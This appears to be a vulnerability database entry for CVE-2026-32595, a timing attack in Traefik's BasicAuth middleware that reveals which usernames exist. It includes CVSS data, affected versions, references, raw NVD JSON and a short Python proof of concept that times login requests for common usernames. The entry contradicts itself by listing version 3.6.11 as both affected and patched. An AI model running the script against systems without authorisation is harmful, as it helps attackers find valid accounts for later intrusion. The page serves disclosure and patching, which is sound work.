CVE-2026-32595

Description

Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.

CVSS Details

CVSS Score

3.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:* - VULNERABLE

Traefik <= 2.11.40

Traefik 3.0.0-beta1 至 3.6.11

Traefik 3.7.0-ea.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

def check_username_timing(url, username, password):
    """
    Checks if a username exists based on response timing.
    Valid username: ~166ms (bcrypt check)
    Invalid username: ~0.6ms (immediate return)
    """
    headers = {
        "Authorization": f"Basic {username}:{password}"  # Simplified, needs base64 in real usage or use requests.auth
    }
    # Using requests.auth for proper encoding
    auth = (username, password)
    
    start = time.time()
    try:
        response = requests.get(url, auth=auth, timeout=5)
        duration = time.time() - start
        return duration
    except Exception as e:
        return -1

# Example usage
target = "http://localhost:8080"
users = ["admin", "root", "test"]
for u in users:
    t = check_username_timing(target, u, "testpass")
    print(f"User: {u}, Time: {t:.4f}s")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32595
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32595
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32595/
[4] VulDB https://vuldb.com/cve/CVE-2026-32595
[5] https://github.com/traefik/traefik/releases/tag/v2.11.41
[6] https://github.com/traefik/traefik/releases/tag/v3.6.11
[7] https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2
[8] https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32595", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:02.537", "lastModified": "2026-03-24T15:14:24.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2."}, {"lang": "es", "value": "Traefik es un proxy inverso HTTP y un balanceador de carga. Las versiones 2.11.40 e inferiores, 3.0.0-beta1 hasta 3.6.11, y 3.7.0-ea.1 contienen un middleware BasicAuth que permite la enumeración de nombres de usuario mediante un ataque de temporización. Cuando un nombre de usuario enviado existe, el middleware realiza una comparación de contraseñas bcrypt que tarda aproximadamente 166 ms. Cuando el nombre de usuario no existe, la respuesta se devuelve inmediatamente en aproximadamente 0.6 ms. Esta diferencia de temporización de aproximadamente 298x es observable a través de la red y permite a un atacante no autenticado distinguir de forma fiable los nombres de usuario válidos de los no válidos. Este problema está parcheado en las versiones 2.11.41, 3.6.11 y 3.7.0-ea.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.41", "matchCriteriaId": "440A1D58-1FFD-408A-A6B0-25E23F5C24AF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndIncluding": "3.6.11", "matchCriteriaId": "90620FAD-4F72-465E-A744-D62559C92F18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*", "matchCriteriaId": "7881B288-5141-4508-AB71-3F7586168437"}]}]}], "references": [{"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr", "source": "security-advi ... (truncated)